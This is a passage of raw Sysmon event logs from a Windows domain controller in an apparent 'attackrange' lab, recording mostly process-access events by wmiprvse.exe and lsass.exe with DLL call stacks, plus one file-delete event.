10341000x80000000000000002243281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-DEAA-00000000AD01}9656C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002243276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6083D25579769F91A252CF51AC49687,SHA256=E52C67790B66B6A10483F259730FEBC54AA5E1821A7FB2E07C61C8264447A49F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.623{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.608{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4